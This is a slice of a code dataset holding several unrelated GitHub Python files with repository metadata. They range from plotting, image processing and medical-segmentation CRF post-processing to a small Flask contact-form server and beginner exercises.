\",\")) for num in xticks]\nynticks = [str(format(num * 10, \",\")) for num in yticks]\n\ncoordinator.initialize_data_gpr(read)\nfor pos in _bo_xs:\n read = {\"pos\": pos, \"s5\": environment.maps[\"s5\"][pos[1], pos[0]], \"s6\": environment.maps[\"s6\"][pos[1], pos[0]]}\n coordinator.add_data(read)\n coordinator.fit_data()\n\nfig, axs = plt.subplots(1, 2) # 4 axs\ncurrent_cmap = copy(cm.get_cmap(\"jet\"))\ncurrent_cmap.set_bad(color=\"#eaeaf200\")\ncurrent_cmap2 = copy(cm.get_cmap(\"cividis\"))\ncurrent_cmap2.set_bad(color=\"#eaeaf200\")\n\ntuples = coordinator.surrogate(_x=coordinator.all_vector_pos,\n return_std=True) # vector de 2 componentes, cada comp 2 imgs\n_map = environment.maps[\"s5\"][~np.isnan(environment.maps[\"s5\"])]\n\nfrom bin.Utils.acquisition_functions import gaussian_ei as ei\n\n# print(bic(_map, get_clean(tuples[1][0].reshape((1000, 1500)).T)[~np.isnan(environment.maps[\"s5\"])], len(_bo_xs)))\ntu = [[], [], [], []]\nacq1 = ei(coordinator.all_vector_pos, tuples[0])\nacq2 = ei(coordinator.all_vector_pos, tuples[1])\ntu[0] = get_clean(acq1.reshape((1000, 1500)).T)\ntu[1] = get_clean(acq2.reshape((1000, 1500)).T)\n# tu[0] = np.power(environment.maps[\"s5\"] - get_clean(tuples[0][0].reshape((1000, 1500)).T), 2)\n# tu[1] = np.power(environment.maps[\"s6\"] - get_clean(tuples[1][0].reshape((1000, 1500)).T), 2)\n# tu[2] = get_clean(tuples[0][1].reshape((1000, 1500)).T)\n# tu[3] = get_clean(tuples[1][1].reshape((1000, 1500)).T)\n\n# auxmin1 = np.nanmin(tu[0])\n# auxmin2 = np.nanmin(tu[1])\n# vmin1 = min(auxmin1, auxmin2)\n# auxmax1 = np.nanmax(tu[0])\n# auxmax2 = np.nanmax(tu[1])\n# vmax1 = max(auxmax1, auxmax2)\n# auxmin3 = np.nanmin(tu[2])\n# auxmin4 = np.nanmin(tu[3])\n# vmin2 = min(auxmin3, auxmin4)\n# auxmax3 = np.nanmax(tu[2])\n# auxmax4 = np.nanmax(tu[3])\n# vmax2 = max(auxmax3, auxmax4)\n\nfor ax, ts in zip(axs, enumerate(tu)):\n if ts[0] < 2:\n aux = ax.imshow(ts[1], origin='lower', zorder=5, cmap=current_cmap)\n else:\n aux = ax.imshow(ts[1], origin='lower', zorder=5, cmap=current_cmap2)\n ax.plot(_bo_xs[:, 0], _bo_xs[:, 1], '^y', zorder=10)\n ax.plot(i_pos[0], i_pos[1], '^y', zorder=10)\n CS = ax.contour(ts[1], colors='k', alpha=0.6, linewidths=1.3, zorder=10)\n divider = make_axes_locatable(ax)\n cax = divider.append_axes('right', size='5%', pad=0.05)\n fig.colorbar(aux, cax=cax, orientation='vertical')\n ax.grid(True, zorder=0, color=\"white\")\n ax.clabel(CS, inline=1, fontsize=12)\n ax.set_facecolor('#eaeaf2')\n ax.set_xlabel(\"x (m)\", fontsize=17)\n ax.set_xticks(xticks)\n ax.set_xticklabels(xnticks, fontsize=17)\n ax.set_yticks(yticks)\n ax.set_yticklabels(ynticks, fontsize=0)\n if ts[0] == 0:\n ax.set_title(\"$\\\\alpha_1(x)$\")\n elif ts[0] == 1:\n ax.set_title(\"$\\\\alpha_2(x)$\")\n elif ts[0] == 2:\n ax.set_title(\"$\\\\sigma_1(x)$\")\n else:\n ax.set_title(\"$\\\\sigma_2(x)$\")\nplt.sca(axs[0])\nplt.yticks(yticks, labels=ynticks, fontsize=17)\nplt.ylabel(\"y (m)\", fontsize=17)\nplt.show(block=True)\n","repo_name":"PeraltaFede/BO_drones","sub_path":"src/Results/plot_maps_malaga.py","file_name":"plot_maps_malaga.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"28898601041","text":"class Fraction:\n def __init__(self, numerator, denominator):\n self._numerator = numerator\n self._denominator = denominator\n \n @staticmethod\n def GCD(m, n):\n while(n != 0):\n t = n\n n = m % n\n m = t\n return m\n \n def reduce(self):\n if(self._denominator == 0):\n raise (ZeroDivisionError(\"Denominator != 0\"))\n gcd = self.GCD(self._numerator, self._denominator)\n \n return self._numerator // gcd, self._denominator // gcd","repo_name":"YeDongVibe/AI_Programming_Class","sub_path":"P.Park/frccl.py","file_name":"frccl.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"39585524500","text":"# -*-coding:utf-8 -*-\n\"\"\"\n@Author: zhangyi\n@Time: 2021/7/26 3:47 下午\n@File: examle.py\n@IDE: PyCharm\n\"\"\"\nimport pandas as pd\nfrom OperateExcel import OperateExcel\nfrom Tools import fileExsits\n\nif __name__ == '__main__':\n\n\t# def main():\n\t# \top = OperateExcel()\n\t# \top.setSheetName(\"哈哈哈\")\n\t# \top.setExcelDirFileName(\"excelData/aaa.xlsx\")\n\t# \tdata = [['a','b']]\n\t# \top.setExcelColumns(['标题列1','标题列2'])\n\t# \top.setExcelData(data)\n\t# \top.addExcelSheetWrite()\n\tdef main():\n\t\top = OperateExcel()\n\t\tcolumns=['col 1', 'col 2']\n\t\top.setExcelColumns(columns)\n\t\tdata = [['a', 'b'], ['c', 'd']]\n\t\top.setSheetName(\"孩子\")\n\t\top.setExcelData(data)\n\t\top.pdLineListWrite()\n\tmain()\n\t# \"\"\"\n\t# 按照列进行写入\n\t# \"\"\"\n\t# def test3():\n\t# \top = OperateExcel()\n\t# \tdata = {'标题列1': ['张三','李四'],\n\t# \t\t\t'标题列2': [80, 90]\n\t# \t\t\t}\n\t# \top.setSheetName(\"孩子\")\n\t# \top.setExcelData(data)\n\t# \top.pdColumnDictWrite()\n\t# test3()\n\t# \"\"\"\n\t# 按照行追加写入\n\t# \"\"\"\n\t# def test4():\n\t# \top = OperateExcel()\n\t# \tdata = [['a','b']]\n\t# \top.setSheetName(\"孩子\")\n\t# \top.setExcelHeaders(True)\n\t# \top.setExcelColumns(['标题列1','标题列2'])\n\t# \top.setExcelData(data)\n\t# \top.pdAppendListWrite()\n\t#\n\t# test4()\n\t# \"\"\"\n\t# 读取excel\n\t# \"\"\"\n\t# def test5():\n\t# \top = OperateExcel()\n\t# \td = op.readExcelFileName()\n\t# \tprint(type(d))\n\t# test5()\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"gongzhuweizi/generalTools","sub_path":" OperateExcel/examle.py","file_name":"examle.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16175546544","text":"#!/usr/bin/env python3\nimport re\nimport sys\n\nfrom enum import Enum\n\n###########################################\ndef serialize_token(token):\n '''serialize_token(token) -> str\n\nSerializes the token (including adding necessary escape sequences).\n'''\n result = ''\n if isinstance(token, tuple):\n # return '(' + ' '.join([serialize_token(item) for item in token]) + ')'\n return ' '.join([serialize_token(item) for item in token])\n if re.search('[\"# \\t]', token):\n result += '\"'\n for ch in token:\n if ch == '\"':\n result += '\\\\' + ch\n else:\n result += ch\n\n result += '\"'\n else:\n result += token\n\n return result\n\n##########################################\n# TODO: only parses a single segment in a file\n\n\n###########################################\nclass ParsedVTF:\n '''ParsedVTF\n\nResult of a VTF format parser.\n'''\n def __init__(self):\n self.type = ''\n self.dict = { }\n self.body = []\n\n def __str__(self):\n return self.serialize()\n\n def serialize(self):\n result = '@' + self.type + '\\n'\n for k,v in self.dict.items():\n result += '%' + k\n\n for item in v:\n result += ' ' + serialize_token(item)\n\n result += '\\n'\n\n result += '\\n'\n for line in self.body:\n result += ' '.join([serialize_token(item) for item in line])\n result += '\\n'\n\n return result\n\n\n###############################\ndef tokenize(line):\n assert line\n assert line == line.strip()\n # TODO: fix this\n\n class ParserState(Enum):\n INIT = 0,\n UNQUOTED = 1,\n QUOTED = 2,\n QUOTED_ESCAPE = 3\n\n state = ParserState.INIT\n token_list = []\n token = ''\n for ch in line:\n if state == ParserState.INIT:\n if ch in { ' ', '\\t'}:\n continue\n elif ch == '(':\n token_list.append(ch)\n continue;\n elif ch == '\"':\n state = ParserState.QUOTED\n continue\n elif ch == '#':\n break\n else:\n token += ch\n state = ParserState.UNQUOTED\n continue\n elif state == ParserState.UNQUOTED:\n if ch in { ' ', '\\t', '#' }:\n token_list.append(token)\n token = ''\n if ch == '#':\n break\n else:\n state = ParserState.INIT\n continue\n elif ch == '\"':\n raise Exception(\"Invalid format: \" + line)\n else:\n token += ch\n continue\n elif state == ParserState.QUOTED:\n if ch == '\\\\':\n state = ParserState.QUOTED_ESCAPE\n continue\n elif ch == '\"':\n token_list.append(token)\n token = ''\n state = ParserState.INIT\n continue\n else:\n token += ch\n elif state == ParserState.QUOTED_ESCAPE:\n if ch == '\"':\n token += ch;\n else:\n token += '\\\\' + ch\n\n state = ParserState.QUOTED\n continue\n else:\n assert \"Invalid parser state: \" + str(state)\n\n if state in { ParserState.QUOTED, ParserState.QUOTED_ESCAPE }:\n raise Exception(\"Missing end of quotes \" + line)\n\n if token:\n token_list.append(token)\n\n return token_list\n\n###############################\ndef getline(fd):\n '''getline(fd) -> [str]\n\nReads a line from the file descriptor 'fd' and parses it into an array of tokens.\n'''\n while True:\n line = fd.readline()\n if not line:\n return None\n\n while line.endswith('\\\\\\n'):\n line = line[:-2]\n newline = fd.readline()\n if not newline:\n raise Exception('Cannot continue beyond the end of file')\n line += newline\n\n line = line.strip()\n if not line:\n # empty string\n continue\n\n if re.match(\"^#\", line) is not None:\n # whole-line comments\n continue\n\n return tokenize(line)\n\n###########################################\ndef parsevtf(fd):\n '''parsevtf(fd) -> ParsedVTF\n\nParses the input from the file descriptor 'fd'.\n'''\n result = ParsedVTF()\n\n type_parsed = False\n while True:\n line = getline(fd)\n if not line:\n # end of file\n break\n\n if line[0][0] == '@':\n if type_parsed:\n raise Exception('Type already parsed before: \"' + \\\n result.type + '\"; new type: ' + line[0][1:])\n if len(line) > 1 or len(line[0]) == 1:\n raise Exception('Invalid type: ' + line)\n\n result.type = line[0][1:]\n type_parsed = True\n\n elif line[0][0] == '%':\n if len(line[0]) == 1:\n raise Exception(\"Invalid key: \" + line)\n\n key = line[0][1:]\n\n if (key in result.dict):\n result.dict[key].extend(line[1:])\n else:\n result.dict[key] = line[1:]\n else:\n result.body.append(line)\n\n if not type_parsed:\n raise Exception(\"Could not find a @TYPE directive\")\n\n return result\n\n\n##########################\nif __name__ == '__main__':\n argc = len(sys.argv)\n if argc == 1:\n fd = sys.stdin\n elif argc == 2:\n fd = open(sys.argv[1], \"r\")\n else:\n print(\"Invalid number of arguments: either 0 or 1 required\")\n sys.exit(1)\n\n parsed_aut = parsevtf(fd)\n print(parsed_aut)\n\n if argc == 2:\n fd.close()\n","repo_name":"ondrik/automata-benchmarks","sub_path":"vtf/util/VTFParser.py","file_name":"VTFParser.py","file_ext":"py","file_size_in_byte":5792,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"31509837740","text":"import cv2\nimport numpy as np\nimport os\nimport re\nimport uuid\nrandom_name = uuid.uuid1()\n\ndef four_point_transform(image, pts):\n \"\"\"\n Функция вырезает необходимую область независимо от ориентации избражения\n :param image: изображение в виде numpy массива\n :param pts: контуры изображения, которое надо трансформировать\n :return: вырезанная область в правильной ориентации\n \"\"\"\n rect = order_points(pts) # координаты контуров\n (tl, tr, br, bl) = rect\n\n # вычисление максимального расстояния(по ширине)\n # между нижней правой и нижней левой координатой, верхними координатоми\n widthA = np.sqrt(((br[0] - bl[0]) ** 2) + ((br[1] - bl[1]) ** 2))\n widthB = np.sqrt(((tr[0] - tl[0]) ** 2) + ((tr[1] - tl[1]) ** 2))\n maxWidth = max(int(widthA), int(widthB))\n # вычисление по высоте аналогично\n heightA = np.sqrt(((tr[0] - br[0]) ** 2) + ((tr[1] - br[1]) ** 2))\n heightB = np.sqrt(((tl[0] - bl[0]) ** 2) + ((tl[1] - bl[1]) ** 2))\n maxHeight = max(int(heightA), int(heightB))\n\n # координаты итогового изображения\n dst = np.array(\n [[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]],\n dtype=\"float32\",\n )\n\n M = cv2.getPerspectiveTransform(rect, dst) # создание матрицы для преобразованного изобр.\n warped = cv2.warpPerspective(image, M, (maxWidth, maxHeight)) # преобразованное изображение\n return warped\n\n\ndef order_points(pts):\n \"\"\"\n Функция нужна для упорядочения координат:\n координаты должны идти в след. порядке [левая верхняя, правая верхняя, правая нижняя, левая нижняя]\n :param pts: numpy массив с четырьмя точками в виде (x, y)\n :return: numpy массив с четырьмя точками в правильном порядке\n \"\"\"\n src_pts = np.zeros((4, 2), dtype=\"float32\")\n # print(pts)\n s = np.sum(pts, axis=1)\n src_pts[0] = pts[np.argmin(s)]\n src_pts[2] = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=1)\n src_pts[1] = pts[np.argmin(diff)]\n src_pts[3] = pts[np.argmax(diff)]\n return src_pts\n\n\ndef remove(tables, errors, bonus_box):\n \"\"\"\n Функция удаляет все изображения .jpg из директорий:\n :param tables: путь к директории, в которой хранятся вырезанные таблицы\n :param errors: путь к директории, в которой хранятся нераспознанные документы\n :param bonus_box: путь к директории, в которой хранятся вырезанные боксы с бонусами\n \"\"\"\n fds = os.listdir(tables)\n fds1 = os.listdir(errors)\n fds2 = os.listdir(bonus_box)\n\n for img in fds:\n if re.search(\".jpg\", img):\n try:\n os.remove(os.path.join(tables, img))\n except Exception as e:\n print(e)\n\n for image in fds1:\n if re.search(\".jpg\", image):\n try:\n os.remove(os.path.join(errors, image))\n except Exception as e:\n print(e)\n\n for im in fds2:\n if re.search(\".jpg\", im):\n try:\n os.remove(os.path.join(bonus_box, im))\n except Exception as e:\n print(e)\n\n\ndef filtration(path, a):\n \"\"\"\n Функция отфильтровывает изображения в директории по параметрам высоты и ширины: не валидные переименовываются\n :param path: путь к директории, в которой необходимо фильтровать изображения\n \"\"\"\n i = 0\n fds2 = os.listdir(path)\n\n for img in fds2:\n if re.search(\"box\", img):\n try:\n image = cv2.imread(os.path.join(path, img))\n if image.shape[0] > 50 or image.shape[0] < 40: # параметры высоты изображения, image.shape = тип tuple\n os.remove(os.path.join(path, img))\n i += 1\n\n\n except Exception as e:\n print(e)\n\n if re.search('work_', img):\n try:\n image = cv2.imread(os.path.join(path, img))\n if image.shape[0] > 50 or image.shape[0] < 40: # параметры высоты изображения, image.shape = тип tuple\n os.remove(os.path.join(path, img))\n a += 1\n except Exception as e:\n print(e)\n\n\ndef rows(path1):\n \"\"\"\n Функция ищет горизонтальные линии - строки, обрезает по строкам изображение\n :param path1: путь к директрии, в которой хранятся изображения для обрезки\n \"\"\"\n fds = os.listdir(path1)\n\n a = 0\n\n for img in fds:\n if re.search(\"bonus\", img):\n # IMREAD_GRAYSCALE обязательный параметр при считывании, без него нельзя работать с шумами изобр.\n image = cv2.imread(os.path.join(path1, img), cv2.IMREAD_GRAYSCALE)\n original = np.copy(image) # сохранение оригинала\n\n i = None\n\n (thresh, img_bin) = cv2.threshold(\n image, 128, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU\n ) # создание шума\n img_bin = 255 - img_bin\n\n # длина ядра изобр, последнее число примерная ширина изобр. в пикселях\n kernel_length = np.array(image).shape[1] // 25\n # обнаружение гориз. линий\n horizontal_kernel = cv2.getStructuringElement(\n cv2.MORPH_RECT, (kernel_length, 1)\n )\n img_temp2 = cv2.erode(img_bin, horizontal_kernel, iterations=3)\n horizontal_lines_img = cv2.dilate(\n img_temp2, horizontal_kernel, iterations=3\n )\n edges = cv2.Laplacian(horizontal_lines_img, cv2.CV_8U)\n # ядро используется для удалени я вертик. линий и коротких горизю линий\n kernel1 = np.zeros((7, 31), np.uint8)\n kernel1[2, :] = 1\n eroded = cv2.morphologyEx(edges, cv2.MORPH_ERODE, kernel1)\n\n indices = np.nonzero(eroded) # координаты гориз. линий\n rows = np.unique(indices[0]) # координата y\n\n filtered_rows = []\n for ii in range(len(rows)):\n if ii == 0:\n filtered_rows.append(rows[ii])\n else:\n if np.abs(rows[ii] - rows[ii - 1]) >= 6:\n filtered_rows.append(rows[ii])\n print(filtered_rows)\n # вырезание строк\n try:\n for i in np.arange(len(filtered_rows) - 1):\n cv2.imwrite(\n (os.path.join(path1, str(\"box__\") + str(random_name) + str(i + a)) + \".jpg\"),\n original[filtered_rows[i] : filtered_rows[i + 1]],\n )\n except IndexError:\n print(\"Thats all\")\n\n a = a + i\n\n if image.shape[0] > 50:\n os.remove(os.path.join(path1, img)) # удаление строк, у которых высота больше 50 пикселей\n\n return a + 1\n","repo_name":"Maksim339/bonus_sys","sub_path":"defs.py","file_name":"defs.py","file_ext":"py","file_size_in_byte":8111,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6844684296","text":"import collections\nfrom operator import itemgetter\n\ndef get_kmer_occurences(seq, kmer_len):\n \"\"\"\n return a list of tuple \n each tuple contains a kmers present in seq and its occurence\n \"\"\"\n kmers = collections.defaultdict(int)\n stop = len(seq) - kmer_len\n for i in range(stop + 1):\n kmer = s[i : i + kmer_len]\n kmers[kmer] += 1\n kmers = kmers.items()\n kmers.sort(key = itemgetter(1), reverse =True)\n return kmers\n ","repo_name":"C3BI-pasteur-fr/python-solutions-1","sub_path":"source/_static/code/kmer_2.py","file_name":"kmer_2.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24893750461","text":"\"\"\"\nLos alumnos de un curso se han dividido en dos grupos A y B de acuerdo al sexo y el nombre. El grupo A esta formado por las mujeres con un nombre anterior a la M y los hombres con un nombre posterior a la N y el grupo B por el resto. Escribir un programa que pregunte al usuario su nombre y sexo, y muestre por pantalla el grupo que le corresponde.\n\"\"\"\n\ndef pedirNombre():\n \"\"\"\n Solicita un nombre por consola.\n\n Retorna\n -------\n str \n una cadena de caracteres con el nombre introducido\n \"\"\"\n return input (\"Introduce tu nombre: \")\n\ndef pedirSexo():\n \"\"\"\n Solicita el sexo por consola.\n\n Retorna\n -------\n str \n un caracter con el tipo de sexo (M/F)\n \"\"\"\n\n sexo = \"\"\n while sexo != \"M\" and sexo != \"F\":\n sexo = input(\"Introduce tu sexo (M/F): \").upper()\n\n\n return sexo\n\ndef asignarGrupo(nombre , sexo):\n \"\"\"\n Asigna el grupo del curso según su nombre y sexo.\n \n Parámetros\n ----------\n str \n el nombre de un alumno\n str \n el sexo del alumno\n \n Retorna\n ---------\n str \n un caracter con el tipo de sexo (M/F)\n \"\"\"\n\n inicialNombre = nombre[0:1].upper()\n grupo = \"\"\n if (sexo == \"M\" and inicialNombre >= \"N\") or (sexo == \"F\" and inicialNombre < \"M\"):\n grupo = \"A\"\n else:\n grupo = \"B\"\n\n return grupo\n\ndef main():\n nombre = pedirNombre()\n\n sexo = pedirSexo()\n\n print(f\"Estás em el grupo {asignarGrupo(nombre, sexo)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-LautaroKruck","sub_path":"src/practica_2_1/ej2_1_6.py","file_name":"ej2_1_6.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70525346349","text":"\"\"\"\nOptimization of Post-Processing for 3D Fully Connected Conditional Random Fields(CRF)\n\"\"\"\n\nimport os\nimport sys\nsys.path.append(os.path.split(sys.path[0])[0])\n\nimport collections\n\nimport numpy as np\nimport pandas as pd\nfrom tqdm import tqdm\nimport SimpleITK as sitk\n\nimport pydensecrf.densecrf as dcrf\nfrom pydensecrf.utils import create_pairwise_bilateral, create_pairwise_gaussian, unary_from_softmax\n\nimport skimage.measure as measure\nimport skimage.morphology as morphology\nfrom utilities.calculate_metrics import Metirc\n\nimport parameter as para\n\nfile_name = [] # File name\n\n# Definition of evaluation indicators\nIA_score = collections.OrderedDict()\nIA_score['dice'] = []\nIA_score['jacard'] = []\nIA_score['voe'] = []\nIA_score['fnr'] = []\nIA_score['fpr'] = []\nIA_score['assd'] = []\nIA_score['rmsd'] = []\nIA_score['msd'] = []\n\n# Define two variables in order to calculate global dice\ndice_intersection = 0.0 \ndice_union = 0.0\n\nfor file_index, file in enumerate(os.listdir(os.path.join(para.test_set_path, 'ct'))):\n\n print('file index:', file_index, file)\n \n file_name.append(file)\n\n ct = sitk.ReadImage(os.path.join(os.path.join(para.test_set_path, 'ct'), file), sitk.sitkInt16)\n ct_array = sitk.GetArrayFromImage(ct) \n ct_array = ct_array.astype(np.float32) \n\n pred = sitk.ReadImage(os.path.join(para.pred_path, file.replace('volume', 'pred')), sitk.sitkUInt8)\n pred_array = sitk.GetArrayFromImage(pred)\n\n seg = sitk.ReadImage(os.path.join(os.path.join(para.test_set_path, 'seg'), file.replace('volume', 'segmentation')), sitk.sitkUInt8)\n seg_array = sitk.GetArrayFromImage(seg)\n seg_array[seg_array > 0] = 1\n\n new_ct_array = ct_array\n new_pred_array = pred_array\n\n # Defining Conditional Random Fields(CRF)\n print('Begin CRF post-processing')\n n_labels = 2\n d = dcrf.DenseCRF(np.prod(new_ct_array.shape), n_labels)\n\n # Obtaining the unary potential\n unary = np.zeros_like(new_pred_array, dtype=np.float32)\n unary[new_pred_array == 0] = 0.1\n unary[new_pred_array == 1] = 0.9\n\n U = np.stack((1 - unary, unary), axis=0)\n d.setUnaryEnergy(unary_from_softmax(U))\n\n # Obtaining the pairwise potential \n # This creates the color-independent features and then add them to the CRF\n feats = create_pairwise_gaussian(sdims=(para.s1, para.s1, para.s1), shape=new_ct_array.shape)\n d.addPairwiseEnergy(feats, compat=3, kernel=dcrf.DIAG_KERNEL, normalization=dcrf.NORMALIZE_SYMMETRIC)\n\n feats = create_pairwise_bilateral(sdims=(para.s2, para.s2, para.s2), schan=(para.s3,), img=new_ct_array)\n d.addPairwiseEnergy(feats, compat=10, kernel=dcrf.DIAG_KERNEL, normalization=dcrf.NORMALIZE_SYMMETRIC)\n\n # Draw inferences\n Q, tmp1, tmp2 = d.startInference()\n for i in tqdm(range(para.max_iter)):\n # print(\"KL-divergence at {}: {}\".format(i, d.klDivergence(Q)))\n d.stepInference(Q, tmp1, tmp2)\n\n # Getting predictive labeling results\n MAP = np.argmax(np.array(Q), axis=0).reshape(new_pred_array.shape)\n IA_seg = np.zeros_like(seg_array, dtype=np.uint8)\n IA_seg= MAP.astype(np.uint8)\n IA_seg = measure.label(IA_seg, connectivity=1)\n props = measure.regionprops(IA_seg)\n \n max_area = 0\n max_index = 0\n for index, prop in enumerate(props, start=1):\n if prop.area > max_area:\n max_area = prop.area\n max_index = index\n \n IA_seg[IA_seg != max_index] = 0\n IA_seg[IA_seg == max_index] = 1\n \n IA_seg = IA_seg.astype(np.bool_)\n morphology.remove_small_holes(IA_seg, para.maximum_hole, connectivity=2, in_place=True)\n\n IA_seg = IA_seg.astype(np.uint8) \n \n # Calculation of segmentation evaluation indicators\n IA_metric = Metirc(seg_array, IA_seg, ct.GetSpacing())\n\n IA_score['dice'].append(IA_metric.get_dice_coefficient()[0])\n IA_score['jacard'].append(IA_metric.get_jaccard_index())\n IA_score['voe'].append(IA_metric.get_VOE())\n IA_score['fnr'].append(IA_metric.get_FNR())\n IA_score['fpr'].append(IA_metric.get_FPR())\n IA_score['assd'].append(IA_metric.get_ASSD())\n IA_score['rmsd'].append(IA_metric.get_RMSD())\n IA_score['msd'].append(IA_metric.get_MSD())\n\n dice_intersection += IA_metric.get_dice_coefficient()[1]\n dice_union += IA_metric.get_dice_coefficient()[2]\n\n # Saving CRF post-processing results as nii data\n pred_seg = sitk.GetImageFromArray(IA_seg)\n pred_seg.SetDirection(ct.GetDirection())\n pred_seg.SetOrigin(ct.GetOrigin())\n pred_seg.SetSpacing(ct.GetSpacing())\n\n sitk.WriteImage(pred_seg, os.path.join(para.crf_path, file.replace('volume', 'crf')))\n\n print('dice:', IA_score['dice'][-1])\n print('--------------------------------------------------------------')\n\n\n# Write evaluation indicators to excel file\nIA_data = pd.DataFrame(IA_score, index=file_name)\n\nIA_statistics = pd.DataFrame(index=['mean', 'std', 'min', 'max'], columns=list(IA_data.columns))\nIA_statistics.loc['mean'] = IA_data.mean()\nIA_statistics.loc['std'] = IA_data.std()\nIA_statistics.loc['min'] = IA_data.min()\nIA_statistics.loc['max'] = IA_data.max()\n\nwriter = pd.ExcelWriter('./result-CRF.xlsx')\nIA_data.to_excel(writer, 'IA')\nIA_statistics.to_excel(writer, 'IA_statistics')\nwriter.save()\n\n# Print global dice\nprint('dice global:', dice_intersection / dice_union)\n","repo_name":"jjiang-mtu/ARU-Net","sub_path":"denseCRF/3D-CRF.py","file_name":"3D-CRF.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3239508706","text":"import pandas as pd\nimport numpy as np\n\n\ndef overlap(box, boxVect):\n\ta = boxVect[:,2] <= box[0]\n\tb = boxVect[:,0] >= box[2]\n\tc = boxVect[:,3] <= box[1]\n\td = boxVect[:,1] >= box[3]\n\tcond = np.any([a,b,c,d], axis = 0)\n\n\treturn ~cond\n\ndef point_in_box(pt, boxVect):\n\ta = boxVect[:,0] <= pt[0]\n\tb = boxVect[:,2] >= pt[0]\n\tc = boxVect[:,1] <= pt[1]\n\td = boxVect[:,3] >= pt[1]\n\n\tcond = np.all([a,b,c,d], axis = 0)\n\n\treturn cond\n\ndef sample(times, interval = 5):\n\tselect = []\n\ts = times[0]\n\n\tfor time in times[1:]:\n\t\tif (time - s).seconds > interval:\n\t\t\tselect.append(False)\n\t\telse:\n\t\t\tselect.append(True)\n\t\t\ts = time\n\n\treturn select\n","repo_name":"BLue1881euLB/gps2road","sub_path":"gps_2_road-master/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"70445946986","text":"import sys\ninput = lambda : sys.stdin.readline().rstrip()\n\nn = int(input())\n\nfnum = 0\ntnum = 0\n\nif n % 5 == 0:\n fnum = n // 5\n print(fnum)\nelif n == 4 or n == 7:\n print(-1)\nelif n % 5 == 1:\n tnum = 2\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelif n % 5 == 2:\n tnum = 4\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelif n % 5 == 3:\n tnum = 1\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelif n % 5 == 4:\n tnum = 3\n n -= tnum*3\n fnum = n //5\n print(tnum+fnum)\nelse:\n print(-1)\n\n\n'''\n#훨씬 좋은 코드\n\nkg = int(input()) # 총 설탕 킬로그램 입력받기\n\ncnt = 0 # 3 빼줄 횟수 셀 변수선언 (즉, 3킬로 봉지량) \n\nwhile kg >= 0: # kg가 0보다 클때 동안만 도는 반복문\n\tif kg % 5 == 0: # 만약 5의 배수면 바로 출력!!!\n\t\tprint(kg // 5 + cnt) # 5로 나눈 몫과 3킬로 봉지수 출력\n\t\tbreak # else문 안걸리게 탈출\n\tkg = kg - 3 # 3킬로 빼줘라\n\tcnt += 1 # 빼준 횟수 하나씩 증가\nelse:\n\tprint(-1) # 다 돌았는데도 없음 -1 !!\n\n\n'''","repo_name":"kdozlo/algorithm-study-Python","sub_path":"algorithm_study/baekjoon/algorithm_type/Greedy/re2839.py","file_name":"re2839.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31463244254","text":"from flask import Flask, render_template, request, redirect\nimport csv\n\napp = Flask(__name__) # sets name to main\n# have debug mode on in command prompt\n# route() for different aspects of the website see the 2 functions below\n# render_template() allows us to send files to web page - need to save html in a folder named 'templates'\n\n'''''\n@app.route('//') # decorator if param has arg with '<>'-we can parse arg. eg, username may be parsed\ndef hello_world(username='username', post_id=None):\n return render_template('index.html', name=username, post_id=post_id)\n'''\n\n\n@app.route('/')\ndef html_pg(page_name):\n return render_template(page_name)\n\n\n@app.route('/') # homepage\ndef st():\n return render_template('index.html')\n\n\n@app.route('/sub_message', methods=['POST', 'GET'])\ndef sub_message():\n if request.method == 'POST':\n try:\n data = request.form.to_dict() # stores data as dictionary\n print(data)\n write_to_csv(data) # calling the function we created below\n return redirect('/thanks.html') # thank you message once form is submitted\n except:\n return 'Unable to save to the database'\n else:\n return 'something went wrong'\n\n\ndef to_file(data): # function that will save data into a text file that we createed\n with open('database.txt', mode='a') as database: # mode = a is append\n email = data[\"email\"]\n subject = data[\"subject\"]\n message = data[\"message\"]\n file = database.write(f'\\n{email}, {subject}, {message}') # writing to text file\n\n\ndef write_to_csv(data): # going to send data to csv file\n with open('database.csv', newline='', mode='a') as database2:\n email = data[\"email\"]\n subject = data[\"subject\"]\n message = data[\"message\"]\n csv_writer = csv.writer(database2, delimiter=',', quotechar='|', quoting=csv.QUOTE_MINIMAL)\n csv_writer.writerow([email, subject, message]) # row of data\n","repo_name":"ElianBooysen/portfo","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18194302872","text":"import warnings\nfrom typing import Tuple\n\nimport numpy as np\nimport pandas as pd\n\nfrom bofire.utils.tmpfile import make_tmpfile\n\ntry:\n from xgboost import XGBRegressor # type: ignore\nexcept ImportError:\n 